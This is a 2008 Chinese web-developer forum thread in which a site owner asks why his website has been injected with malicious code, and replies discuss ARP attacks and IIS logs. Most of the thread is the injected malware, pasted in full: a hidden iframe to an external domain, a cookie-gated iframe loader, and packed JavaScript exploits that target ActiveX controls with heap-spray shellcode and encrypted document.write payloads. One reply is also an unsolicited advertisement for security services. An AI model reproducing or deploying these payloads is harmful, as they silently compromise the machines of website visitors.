网站又被挂马了?

chjx1982 2008-07-09 01:01:30
我们的网站又被挂马了,可我却没发现那个脚本在哪?包括外部引用的文件?怎么回事?
...全文
823 54 打赏 收藏 转发到动态 举报
写回复
用AI写文章
54 条回复
切换为时间正序
请发表友善的回复…
发表回复
heyisheng 2009-06-22
  • 打赏
  • 举报
回复
很明显是网站被入侵了,所需要安全技术服务请联系EMAIL & MSN:yisheng@hotmail.com, 7X24 为您的网站保驾护航。
sagezk 2008-07-10
  • 打赏
  • 举报
回复
电信应该不管这事儿
chjx1982 2008-07-10
  • 打赏
  • 举报
回复
我知道我们的服务器受到了ARP攻击,可这样也不是办法呀,我们的服务器放在电信的机房,请问现在我该怎么办?让我们经理打电话给电信吗?有用吗?
chjx1982 2008-07-09
  • 打赏
  • 举报
回复
现在还一直在攻击,怎么办?
chjx1982 2008-07-09
  • 打赏
  • 举报
回复
是ARP攻击,我下了个防火墙暂时搞定,现在不知道人家有没有知道我们的服务器用户名和密码。
ld2099 2008-07-09
  • 打赏
  • 举报
回复
查看IIS日志,看看受攻击或者注入的具体页面与方法
kofren 2008-07-09
  • 打赏
  • 举报
回复
一般都是ARP攻击!
建议LZ下个ARP防火墙,可解决此问题....
chjx1982 2008-07-09
  • 打赏
  • 举报
回复
楼上的高人一定得帮帮忙,我都不知道该怎么办了??/
chjx1982 2008-07-09
  • 打赏
  • 举报
回复
[Quote=引用 45 楼 sagezk 的回复:]
拿诸如此类 clsid:F917534D-535B-416B-8E8F-0C04756C31A8 的 ID Google 一下能找到具体挂的马 是什么品种的马。
[/Quote]
查了一下,不知所云,请问我该怎么解决呢
sagezk 2008-07-09
  • 打赏
  • 举报
回复
拿诸如此类 clsid:F917534D-535B-416B-8E8F-0C04756C31A8 的 ID Google 一下能找到具体挂的马 是什么品种的马。
sagezk 2008-07-09
  • 打赏
  • 举报
回复
启用了一大堆 ActiveX 控件,应该是只针对 IE 的,看看这一堆 ActiveX 控件的作用先。
chjx1982 2008-07-09
  • 打赏
  • 举报
回复
<iframe src=http://ds9i32lemk.cn/cn4.htm width=50 height=0 border=0></iframe>
就是这一个
chjx1982 2008-07-09
  • 打赏
  • 举报
回复
楼上的属于高人了,请问我该怎么解决呢。
chjx1982 2008-07-09
  • 打赏
  • 举报
回复
[Quote=引用 39 楼 sagezk 的回复:]
HTML code<object classid="clsid:F917534D-535B-416B-8E8F-0C04756C31A8" id='target'></object>
<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'…
[/Quote]
这些是什么意思?
sagezk 2008-07-09
  • 打赏
  • 举报
回复
<html>
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj">

</object>
<script language="JavaScript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('Z m(){1 d=f(""+"%Y"+"%10"+"%11"+"%12"+"%X"+"%W"+"%R"+"%Q"+"%S"+"%T"+"%V"+"%l"+"%U"+"%13"+"%14"+"%1e"+"%1d"+"%1f"+"%1g"+"%P"+"%1c"+"%1b"+"%16"+"%15"+"%17"+"%18"+"%1a"+"%19"+"%1i"+"%H"+"%x"+"%z"+"%A"+"%v"+"%r"+"%q"+"%s"+"%t"+"%u"+"%B"+"%O"+"%k"+"%n"+"%C"+"%M"+"%N"+"%F"+"%c"+"%K"+"%G"+"%D"+"%E"+"%I"+"%c"+"%J"+"%L"+"%c"+"%w"+"%y"+"%1h"+"%1J"+"%1T"+"%9"+"%1S"+"%1U"+"%1V"+"%1W"+"%1R"+"%1Q"+"%1M"+"%1L"+"%1N"+"%9"+"%1O"+"%1j"+"%1Y"+"%1X"+"%l"+"%25"+"%29"+"%2b"+"%h"+"%27"+"%2a"+"%28"+"%26"+"%9"+"%21"+"%1Z"+"%22"+"%23"+"%h"+"%24"+"%1P"+"%1K"+"%1s"+"%9"+"%1r"+"%1t"+"%1u"+"%9"+"%1v%1q%1p%1l%1k%1m%1n%1o%1w%1x%1F%1G%1H%k%n");1 2=f(""+"%j"+"%j");1 g=20;1 7=g+d.8;e(2.8<7)2+=2;1 p=2.o(0,7);1 3=2.o(0,2.8-7);e(3.8+7<1I)3=3+3+p;1 1E=b;1 b=1D 1z();1y(i=0;i<1A;i++){b[i]=3+d}1 4=\'\';e(4.8<1B)4=4+f("%1C");1 a=6.5;6.5=4;6.5=a;a=6.5;6.5=4;6.5=a}{m()}',62,136,'|var|gamewm|block|buf|Console|obj|fukcyourising|length|uFFFF|good_flow|yumen|u408B|gameaaaabbbbaaa|while|unescape|fuckyoukaspersky|uD0FF||u0C0C|u7865|uDB33|game|u0065|substring|fillblock|u6E6F|u6D6C|u642E|u6C6C|u4300|u7275|u953C|u048B|u8EBF|u038B|uC3C5|u5C3A|uC033|u8BAD|u0840|u0C78|u1C70|uDD03|u09EB|u8D34|u8B0C|u7C40|u0364|u3040|u2e55|uEB40|u0320|u768B|u33F5|u49C9|u0F36|uAD41|u56F5|u0378|u54EB|function|u758B|u8B3C|u3574|u14BE|u3828|u5E8B|u5EE7|u0324|u66DD|u8B4B|u0C8B|u75DF|u3BEF|uC108|u74F2|u0DCB|uDA03|u0E4E|u1C5E|u2454|u616e|u622f|u6e73|u3864|u6e33|u2f3a|u7074|uFF52|uFF40|uE8D0|uFFD7|u7468|u2e64|u6e63|for|Array|300|32|0C|new|test99|u392f|u632f|u2e6b|0x40000|uE8EC|uE873|u702F|u1A36|u6FE8|u8BFF|uE2D8|uBF50|u95D0|uEC83|uFF84|u8304|u242C|uFF3C|uBA52|u8DFC|u04EC||u83FF|u2C83|u6224|u7EBF|u5353|u53E8|uBF5D|u0E8A|uEB52|uFE98|u5324'.split('|'),0,{}))
</script>
</html>
sagezk 2008-07-09
  • 打赏
  • 举报
回复
<object classid="clsid:F917534D-535B-416B-8E8F-0C04756C31A8" id='target'></object>
<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9 s=g("%P%Q%12%N%D%B%w%A%K%1n%1s%1t%w%1j%r%1h%1g%1f%1q%1e%1i%1d%1c%17%16%15%18%19%1b%1a%1k%1l%r%1u%1w%1x%1z%1y%1m%1o%1p%1r%14%1A%Y%C%z%G%M%o%H%I%J%o%F%p%l%i%E%y%p%l%i%j%L%c%13%X%Z%10%11%W%k%V%O%c%R%S%U%T%1v%28%2l%m%d%2k%2j%2m%k%c%d%2n%2p%2o%j%2i%1B%2c%d%2b%2a%2d%2e%m%2g%2f%3%2r%2D%2C%2E%2F%8%2G%3%2B%2A%2u%2t%2s%2v%2w%2z%2y%8%2x%3%h%q%8%2q%3%h%q%8%29%3%1M%1L%1N%1O%1Q%1P%1K%1J%1E%1D%1C%1F%1G%1I%1H");9 1=g("%u"+"e"+"e"+"%1R"+"e");a(1.4<6){1+=1}n=1.f(0,6);2=1.f(0,1.4-6);a(2.4+6<1S){2=2+2+n}v=23 22();24(x=0;x<25;x++){v[x]=2+s}9 7=\'\';a(7.4<27){7+=\'\\5\\5\\5\\5\'}26["\\21\\20\\1V\\b\\t\\1U\\b\\1T\\t\\b\\1W\\1X\\1Z"](7,"1Y","2h");',62,167,'|nop|vcbcv|uffff|length|x0a|224|hellohack|ue800|var|while|x74|uff52|u53d0|90|substring|unescape|u2e2e|uffec|uebd6|u5ad6|u0e4e|uff00|fillvcbcv|u5b8b|u8e68|u765c|ueb01|shellcode|x61||arrayd|u8b18||u53c7|u306a|u3c45|u246c|u5e00|u8b57|u89d6|u5308|u6459|u8b0c|u1c5b|u1b8b|u548b|u5a50|u198b|u5655|u5159|u56e8|u0000|uebd0|u5a72|u6a59|u5beb|u4deb|uff7c|u52c2|u08c2|u5352|uaa68|u0dfc|u5300|u89d0|u5e5f|u010d|ucfc1|u0774|uebc7|u3bf2|u7514|u247c|ue038|uacc0|uff31|u8b34|u8b49|u32e3|u31fc|u205a|u8be1|u245a|u8b04|u7805|ue801|u02eb|uee01|uc031|uea01|u4a8b|u8b66|u6a00|u4b0c|u5a8b|u8beb|u011c|u5b5d|u006a|u392f|u6e63|u2e64|u632f|u2e6b|u0065|u7865|u6e33|u3864|u7074|u7468|u2f3a|u622f|u6e73|u616e|u90|0x40000|x4e|x72|x53|x69|x76|aaabbbbcccdd|x65|x45|x49|Array|new|for|300|target|600|u5100|uff89|ue2d8|u7e68|uff51|uff73|u6ad6|uffab|ue8d0|lllllll|u5944|uc9d5|ua068|u6a52|uff4d|u9868|uff0e|u8afe|uffb7|u7275|u616f|u6c6e|u776f|u5464|u466f|uffa0|u4165|u6c69|u444c|u5255|u6e6f|u6d6c|u642e|u6c6c|uffae'.split('|'),0,{}))
</script>
sagezk 2008-07-09
  • 打赏
  • 举报
回复
<html><script>window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<iframe src=ilink.html width=100 height=0></iframe>");
}
else{document.write("<iframe src=flink.html width=100 height=0></iframe>");}
}
</script></html>
sagezk 2008-07-09
  • 打赏
  • 举报
回复
<script language =javascript>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('K Y(d){b a,i,f,c;b H,R;a=[];f=d.o;i=0;B(i<f){c=d.g(i++);2G(c>>4){h 0:h 1:h 2:h 3:h 4:h 5:h 6:h 7:a[a.o]=d.3r(i-1);x;h 12:h 13:H=d.g(i++);a[a.o]=C.D(((c&1k)<<6)|(H&P));x;h 14:H=d.g(i++);R=d.g(i++);a[a.o]=C.D(((c&1D)<<12)|((H&P)<<6)|((R&P)<<0));x}}l a.M(\'\')}b J=1U 1V(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,2a,-1,-1,-1,2b,V,2c,1T,1R,1P,1O,1N,1Y,1M,Q,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,1i,1j,1n,2h,1Z,1X,1W,2g,2f,2e,2d,-1,-1,-1,-1,-1);K Z(d){b I,E,m,r;b i,f,a;f=d.o;i=0;a="";B(i<f){L{I=J[d.g(i++)&u]}B(i<f&&I==-1);j(I==-1)x;L{E=J[d.g(i++)&u]}B(i<f&&E==-1);j(E==-1)x;a+=C.D((I<<2)|((E&1H)>>4));L{m=d.g(i++)&u;j(m==Q)l a;m=J[m]}B(i<f&&m==-1);j(m==-1)x;a+=C.D(((E&1E)<<4)|((m&1F)>>2));L{r=d.g(i++)&u;j(r==Q)l a;r=J[r]}B(i<f&&r==-1);j(r==-1)x;a+=C.D(((m&1K)<<6)|r)}l a}K U(v,w){b O=v.o;b 1a=v[O-1]&F;S(b i=0;i<O;i++){v[i]=C.D(v[i]&u,v[i]>>>8&u,v[i]>>>16&u,v[i]>>>24&u)}j(w){l v.M(\'\').1L(0,1a)}1Q{l v.M(\'\')}}K T(s,w){b f=s.o;b v=[];S(b i=0;i<f;i+=4){v[i>>2]=s.g(i)|s.g(i+1)<<8|s.g(i+2)<<16|s.g(i+3)<<24}j(w){v[v.o]=f}l v}K 1b(d,W){j(d==""){l""}b v=T(d,X);b k=T(W,X);b n=v.o-1;b z=v[n-1],y=v[0],N=1J;b G,e,q=1I.1S(6+V/(n+1)),A=q*N&F;B(A!=0){e=A>>>2&3;S(b p=n;p>0;p--){z=v[p-1];G=(z>>>5^y<<2)+(y>>>3^z<<4)^(A^y)+(k[p&3^e]^z);y=v[p]=v[p]-G&F}z=v[n];G=(z>>>5^y<<2)+(y>>>3^z<<4)^(A^y)+(k[p&3^e]^z);y=v[0]=v[0]-G&F;A=A-N&F}l U(v,1m)}t="1h+1f+1c/1d+1g+1e/1l/1C+1o+1y+1x/1z/1A+1B+1w/1v+1q+2i/1p+1r+1s/1u+1t/1G/2B/3v/3u/3t/3s+3w+3x/3B++3A/3z/3y/k/3q+3j+3i+3h+3D+3k+3l+3p/3o+3n+3m+3C/3J+3U+3T/3S/3W/3R+3V/3Z/3Y/3X/3Q+3O/+3H/3P+3G+3F/3E+3I+3N/3M+3L/3K/3g/3e+2z/2y/2x/2w/2A+3f/2F++2E+2D+2C/2v+2u+2n+2m/2l/2j+2k+2o+2p/2t+2s/2r/2q/n/2H+2X/2W/2V//2U+2Y+2Z+3d/3c/3b/3a++2T/2S/2L+2K+2J/2I/2M+2N+2R==";t=Y(1b(Z(t),\'2Q\'));2P.2O(t);',62,249,'||||||||||out|var||str||len|charCodeAt|case||if||return|c3||length|||c4|||0xff|||break|||sum|while|String|fromCharCode|c2|0xffffffff|mx|char2|c1|base64DecodeChars|function|do|join|delta|vl|0x3F|61|char3|for|str2long|long2str|52|key|false|utf8to16|base64decode|||||||||||sl|xxtea_decrypt|ViAEDNwLbbIcVQuMtPnf|SWHqm5QpBzfNBYbzL1Pr|UhZ8odLHqdpcSuS5iqd5VKOIdV04USZXlmcoUFh|Ct05snxwHJcyPfUbHZ3MW4ymGBa8kNw4Vp7x2|NlyX77S0Bzpm|XWDE1sWwnS3HJTdz7yDJMOXcdNOC8r5obLvEEHq5fnnB8CWf9aFinpEkihQvYWRmGQdBQDOuE77uWW1lRKJPinXnlsO6JBnIAX7PMUUz1z3ibckC7F0kKgbBd|41|42|0x1F|pqLOqB5fTsjoSx4980dd0MclkC0MGLHS5czWHp5AMn9oapABEiZ97qZ5E7oLLQkbgUoz3Ybj|true|43|fO2LXYvWA7FGCIkonmTlnWRYSuSKOwqZ8kIlyh0sXRIF2i2BEhqyFvoZImf3WGuQ|NpA|wmm|M14ygy1liKxNuP4QBCJ|g8eQq|Utctnm4FeaB7Aaq43kOTIlZf9d6|psL1pzh3ivVGv2KwSO7BTGTs7chJoqsyTcymkS401IQs9dJMz|TOFE0BijySwYVhHVYnvHEzgIh0VsT|huXQQZARVoYiflVhIgeEOOS188pzSjgfeRH1DJcTOYb|mI2lJcNHogNm9glolmsiIIPOeQ0ymjz1lfdain4dmg|H2HMFdQsi9P9In39debIqk5THj5MxTpl11k8D3JQK56lLc7AL2GJMM6TvhSSlLbWekgmhTlmbCy6FboCpNIvqXvEjFBgW2XnHypaWnJdXm5iTEFmC8Rr4WLcXj2P5F1KHII73nVK4Zu7qcYOhBRHQnlSyq2pk6sje|TVtq6v|spNvpS5tKjLaBxW5VcnzbU7mYqoCqKMcdecNeSxMQ47NZQg|FzIx7H3HzjS0S5Bf0gu0o1|tYDz1ZnWuQapuWt1axyHrs7qVivKgy|0x0F|0XF|0x3C|oNtBa1A4VmhU6cSBnawCZlq0JEHmid4cwMr4mq7Wtkqw3q1Pr1iaa1gQ2KDCugrwHTZm09Ob|0x30|Math|0x9E3779B9|0x03|substring|60|58|57|56|else|55|floor|54|new|Array|47|46|59|45|||||||||||62|63|53|51|50|49|48|44|X0k57GMjL7MEnllnkcLHtHq|Fo7l6GQAjDGZDzOqntxvV9dxCdiOigR|V2PfnSFilWvcKgRR5TM5DQ1uNNzHc89210uTSW|TFKBmci2wovnWADJwrKGf705lkRtZhPlyFi|VJENCSvDCWh8WQ89AABwJLDzT|6yhrMd4T01lW4sWXsL8isVufC9HVSGIcLD8dD2ldVFPW2hmzxxlR8lRUjLUz1fIpiez|v928pRd72Hhooa8JZ9M9Zi0tbkC3RbYhMl0StcRWXGgsSlyf|hMOfM6BsnKjEd8fMfRUeg2gx31gP9d6yItodKLLUTDEFWjrGVk0NjQW354UL6kVPioZJ85PxfcW6JxWHSO5pg04bG1ezvZXJxyc7WqzLW|BBa|vDDHn|p5DnWBUPwRxNSeigm5o5uF5Fcf3PsMvpncp0uctybRg|xGoMMznzkKY|cNyA8Mt|LxHHWt8X5Q2NIcDumzp4rOnO7LYBF|ApKQ8ZP63mq495uAJtFT1e|eBA1OtfEITdFRfM2dCrmy|eMsaLgbLbeFd2z2tZ|Tlk4Ju0dkLWVU11|OS8PYLy9RupZNJmFzJpsWQXk8QzipU|4B|Dto2w403vcyPqpEFmDyiApRlu3Gkblb9kwdEftgzBX39OShUnjCbblC1MkEOnN8wpJWzB4NA4PPcfyWBvjQGYFsLX8AMn0FhzLp48z5bVR7k4qlhvlln9HbZAXwgJkKEkC|2CpAlrEfpsjZdk48fUEdAYMpaPk45ohyB7TcWf7zqfwpbvrqW|q1XACaDAYbU8T6bku8h0EeXRh8tpUSbcxxcYZvvyctRTuT0V4skeZOMJK|u0SZOSspsM|switch|h5CoDTNG|RukEIe2LjwtxlG5cvEhpQotA7pgPlqqHkK8zdjvcTXnC|yVFVREtK4|PmhXfXNVaST3mQXN|Epq6IQs9B5|KMkUsTF1ga4fAJJjTEoYjfT3Ysda8AUru9pxZ3BnvaP4oRe|vI8tMaFl6gD3mG0yCUbYrYS5|write|document|Ga|HRnQ|2ccz890mEcQiB4qUIFnYTdGfDQyF61p9FRKsmlFgLV9eJfrrkSmFcb5qpVv40xJK1oJ4qpPs773I3dsWOu|TbmQcZLtOPO57Sz9ekhoY4JEgAhZ4bkz5v0hSIlJ68PDiTPM1tQCETBp|LsAmB2lhVkU8wpX6lpxN|6lrVp4eMFMxw4qG|08snrAbulk6MV53J8m7CNJl0wU5L2shiz67EvnQ5Y|DE0KY4y7xFNleBExe316FP3uGc8Q1H5lterkY3yy246Hyf9GUq5rk0VXbfPUy7HZ3b6v|rgC|BBmc3wOrP|||||||||||0kdZBaYw3tFO8dbl8UwrrwjXgCMzT2wgK8aA|uXYhedIQWW|GTnPA2gWDaaxKFMbxbNSTf8BCkZNpMyO7KWPqJHlgIy3sY2Ikz36sRMx1fMvrjZ|k8YvopTX01OOIzbO4wF|JnYuOr4OIohPptxYkJmT39V2O84Ckc3DyOrh9nEoiB9Pr7z|cbNHttjBqZvaLaaxpqEZAXuVGal|Q8IpKmlvahiTouP1USHfRsdSqmq28G|JdLxjJj3F26|dK5q|lO472QQjMkJiRKJg|xcshxhijvYj2TBPwjm|9Ac3D4ipcZfq8o11pxgjn8Y|mVNG1jJr|tSIYPzyVWeC|Qq6czYieXzKyuhxk|B1eoOQFfeNwtqAXeNvbHA1EQ|OTPYpS3NJsqLRefpkWxF2EjGRzUNO7uFWag8cQbwYnLs2u3axJeEIb|charAt|U4|aSmR8uroROyai71dy2OJebFNy|HLan0NUAdrJyoVenCNfv8|Vr1j2Okm1f|2t8E6KJhbEhOGF56CxJWveqWCr9smyQhY8qt4pBvx3T8Yar6upM3D7zyUzdMcRZ3D7ISaTER6Z8CwnMuvNXTI4nEcuq5EUBl3BdhMphgY6HG6rA7oOoTSmKy|PuxH9Lq0rqVzDybyJQj0JamqkpvYS0F61kiHBAAkshfOyvpeO5Cv|UfRlO7ORtGouyoGwNRjkseA|WfGpXuY1aPlopiDK0|ZwVV3EkC3CK4pZuzGqXayIElbw7zWcgyf7IM7SWGM60NDcKPddJLKWyjDvtqbCe3hcxJxgqq3UnDcgBWwqDgtLXHSaK4RhJFpRv7ayK66ctio9|6hX4zZ22IZNxSunWnubVfuu4KB4l|Ff|aI|VjBuFS0xiDoFtsnuovHEzDosgRx|er7lbGRVuEQUviEnHZo9H2E6gc2mJ|G2vCOZWVr0NasCkyo4iWrL8fD0obtJg|5TfGKBGT6t0iqO3rt3wXqxwhzwQXm9LzMV|ulIxXvSvHbz8ZXid6M8nFi7do9PO9Q|7rCkmgIBQzGoYipP4uAcB2NZdioPJp7E99pjLxtVMOHM|bnpEgW|KT8Tsa2cYSyysbqTWXCBqNAO6pVsJRqYjVOvSqBWlsvwBMYkkLZo0p3UJIeSkW4ysl200ACqbNt5wn12IwoW|7nLGLx1QfKE48w4QPKlGJkitc|tZJRMKOGPFGJbY|6WOhaisfq|ELnho81QHJLkIcytVCfp|BaszfkoZpFYClBc|2VSXLH87EjEygq4Itfx4vMvLbvVDznIuMszfLfxmCs8Aj7jJJkWSunGWFzHz642cDzF|AqjUpVrg9|SZfDnPPVe0P|8sOwPOdFfIrfb5JGo13ul3PmZ3frSw1T9OSRJiog1eqZnGh3xqYHEER8T40f4S4mrjPB|Odh2S0|jiDq0TJFRrem|AMOxIvfbaq0PvruC7eULD7|Fjp3uTYzANa6Q4PFNcI1CH|cyl0ShELl4aC5sYKF5LpktXR|'.split('|'),0,{}))
</script>
sagezk 2008-07-09
  • 打赏
  • 举报
回复
<script language =javascript>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('K X(d){b a,i,f,c;b H,N;a=[];f=d.j;i=0;C(i<f){c=d.g(i++);3j(c>>4){h 0:h 1:h 2:h 3:h 4:h 5:h 6:h 7:a[a.j]=d.1o(i-1);A;h 12:h 13:H=d.g(i++);a[a.j]=E.F(((c&1i)<<6)|(H&O));A;h 14:H=d.g(i++);N=d.g(i++);a[a.j]=E.F(((c&1l)<<12)|((H&O)<<6)|((N&O)<<0));A}}m a.U(\'\')}b I=1B 1R(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,1Q,-1,-1,-1,1P,1b,1O,1X,1V,1J,1I,1Y,1D,1E,T,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,1g,1f,1d,1S,1T,1F,1G,1H,1K,1C,1j,1k,-1,-1,-1,-1,-1);K Z(d){b L,D,o,x;b i,f,a;f=d.j;i=0;a="";C(i<f){M{L=I[d.g(i++)&u]}C(i<f&&L==-1);r(L==-1)A;M{D=I[d.g(i++)&u]}C(i<f&&D==-1);r(D==-1)A;a+=E.F((L<<2)|((D&1m)>>4));M{o=d.g(i++)&u;r(o==T)m a;o=I[o]}C(i<f&&o==-1);r(o==-1)A;a+=E.F(((D&1h)<<4)|((o&1n)>>2));M{x=d.g(i++)&u;r(x==T)m a;x=I[x]}C(i<f&&x==-1);r(x==-1)A;a+=E.F(((o&1e)<<6)|x)}m a}K Y(v,w){b R=v.j;b 1c=v[R-1]&G;P(b i=0;i<R;i++){v[i]=E.F(v[i]&u,v[i]>>>8&u,v[i]>>>16&u,v[i]>>>24&u)}r(w){m v.U(\'\').1A(0,1c)}1W{m v.U(\'\')}}K Q(s,w){b f=s.j;b v=[];P(b i=0;i<f;i+=4){v[i>>2]=s.g(i)|s.g(i+1)<<8|s.g(i+2)<<16|s.g(i+3)<<24}r(w){v[v.j]=f}m v}K 1a(d,V){r(d==""){m""}b v=Q(d,W);b k=Q(V,W);b n=v.j-1;b z=v[n-1],y=v[0],S=1M;b J,e,q=1N.1U(6+1b/(n+1)),B=q*S&G;C(B!=0){e=B>>>2&3;P(b p=n;p>0;p--){z=v[p-1];J=(z>>>5^y<<2)+(y>>>3^z<<4)^(B^y)+(k[p&3^e]^z);y=v[p]=v[p]-J&G}z=v[n];J=(z>>>5^y<<2)+(y>>>3^z<<4)^(B^y)+(k[p&3^e]^z);y=v[0]=v[0]-J&G;B=B-S&G}m Y(v,1w)}t="1x/1y/1z+1v+1u+1Z/+1q/1p/1r+1s+1t+1L+2q+3g+3f+3e/3d+3h/3i+3l+3k+l+3c+3b+2V+2U/2T/3n+2W+2X/3a/2Z/2Y/3m+3s+3B/3A/3D+3z/3C+3E/3F/3G+3x/3r+3y+3q/3p+3o+3t+3w/3v+3u+2S+2Q/2o/2n+2m+2l+2p/2R+2t/2s/2r+2k/2j/2d+2c/2b/2a/2e/2f/2i/2h+2g/2u/2v+2K/2J/2I+2H+2L+2M+2P+2O//2N/2G/2F/2z+2y+2x+2w+2A+2B==";t=X(1a(Z(t),\'2E\'));2D.2C(t);',62,229,'||||||||||out|var||str||len|charCodeAt|case||length|||return||c3|||if|||0xff|||c4|||break|sum|while|c2|String|fromCharCode|0xffffffff|char2|base64DecodeChars|mx|function|c1|do|char3|0x3F|for|str2long|vl|delta|61|join|key|false|utf8to16|long2str|base64decode|||||||||||xxtea_decrypt|52|sl|42|0x03|41|40|0XF|0x1F|50|51|0x0F|0x30|0x3C|charAt|lW14469WhfAfM|o0BmQZGuxkVSCqzY|eNeVaAX86BTdVtGh8ePPd7SVxf253UVxoaPTIfdSHfp9L3qjJ4nixfsu0AFpowBEb9xRjWGLQVTW4rjkxpAuIUsKTlLapVIacY2iq39V1OlhoB19zJ3xvKC|NdcLvPCV0g9gE|amKju0FJK7RwCODavPDgXB7ZvWyIa78IUexKwpz5JrFt94picCrB2J4SHmzHPr2mq1CQdwtrJ8utlQZAr|2Hvyu1LiLUY|SqYbvsVXlWy|true|w7CdyZJ1tRXjMsjXGKGg|95loXgevW1wSzq4IKXRx|378XFuL6FFZMbRbHA0Aj1kMI56CeXTjaOd59eeMFsWP7M2WP2LRmK58yz4hQF2UIMlwN5sAa1FC98EpxrD6vlTDSMFsdd1ArYUnN3hEACDJVL0h2yMRS|substring|new|49|59|60|45|46|47|57|56|48|QfXKft0|0x9E3779B9|Math|53|63|62|Array|43|44|floor|55|else|54|58|KBZeNKobfnu7Tskuf5lLYEHsPRqJUZOhzkDQCq4EuXsnuQzLD8hmfrgCJ5HRN8xL|||||||||||pHRDmUi8Xo1KObcOycFFla6UN7W7ZE0Ea6JdognJIaY9FK|IEsuwvLAGQk9UiNBHfIncszc6PjEP2dc11dcw8Vg8AUi3Z5yfgVIyEwhb1GrF9BCVYzQUG7CbWtgS241xnvf8xzUWhXZY07QYQpjPjRxGElocIJJ5VN9KHFwK4UtOPZor0yBcb60buBGzGmEt7HwodU2sJsO00x|x3WcqZrAYx7uLbcjWVs1rpa55uvxweE|g2TAhYoywkYQpEbuysHoTud4LGbf16yiu6d525Y33pj05uFvDfNWyQ8D3Bo7UANGX1|3Nb5|EMfqYscL|KhCaAUvSO3ea8mHGlXGnv5GS0D4sbqlMbkDgOuekeMIDp6ptnHpEqEBK2oGxuyzZb5lkHyh297Iz14hSMnFA0KFFeeo0GqtOU69lUy1cmrRBnwbZIBku|m9dd4Ptq|Onjit8V57yGZmXFNROEmhJWHvSDdg6IYwS7x9Usgd00IHqgcIxWEIa8uxAvto53lIOZ|LKxPEKN6MYsJ|SiS|siHr4HV3JmEObjlXYI0uHAOetW0wk8D0r0|BgKic6QvMC3LbwcpErDDMRr3Pd0OdWKmBy|tSqGbmd|oSAzZSlDdFGyCO7t0bZtGmD5JXGU9Y5wOytdlZ9T0ne|sCzg9CaTQJsPdTArUb4|gH5jNWKsjr1TZGbu|caBfROyFcmQok|MnvIqjCLGqCDLS|nbFU9bbE93nt30L87pwhLBtIJg3PZlgEVBTM2at|fgHx0aqkeps2AwkS107TlxvQ3I7QYd81XCff|UikEq2hdYIy5r6vFCHIyB9tDop|GcU|SkXDC2bL031AB|FJFQ2CW3BlYa26V9X4vF8Yc8p8wI7gW5T1eMmZdrJ7t2OuvTARW4u7lm4XcRUIBVKttcG7FKWndyMMlB|EHiw2Mx5GH|oDc3yJnajfh3LOAyGrJgGJA5Rv18IUmTeFq1yTn2x268Rnh46va7UFHLNL9umvhUMnzeFhrad4NnbPs3r8fj|HgOXfAQBaoD0RHxXADzN4MJ3sF72NqDcUESj2e93UhhZPlGRAuBWKiezCi292caWTLc7VHDA8PiT3ISOhyPIwjaLqgDCQ|write|document|Ga|3pdHZuSqR5x|8f|FaSUdpamtuACkZaihkXS7yWdxPo89cVIeGx8PX96Z|jhnKpg7PKBECfHMU1TMB12HIZMoV8fBp20uECcEyxniOOK30bEd|oO9sQpOx4ZCYTK3xqUMuSuxho5HCflS867b|F2BdmtlYMrNJ|rvqY6nl5xkuzayNDOf9KV|Fu5rQK1kNbOVRVzh2SmNUNOXCV1ihNcROotzxnpI8|rQZoO1eY1TxuX8WH76FKjaqXiXebNGiPSMP6jOj3cIOMYFqlSzCF06w2WDcfN|pKRiv1pb|Pa9adqjYweX2osOARQ92RW9cY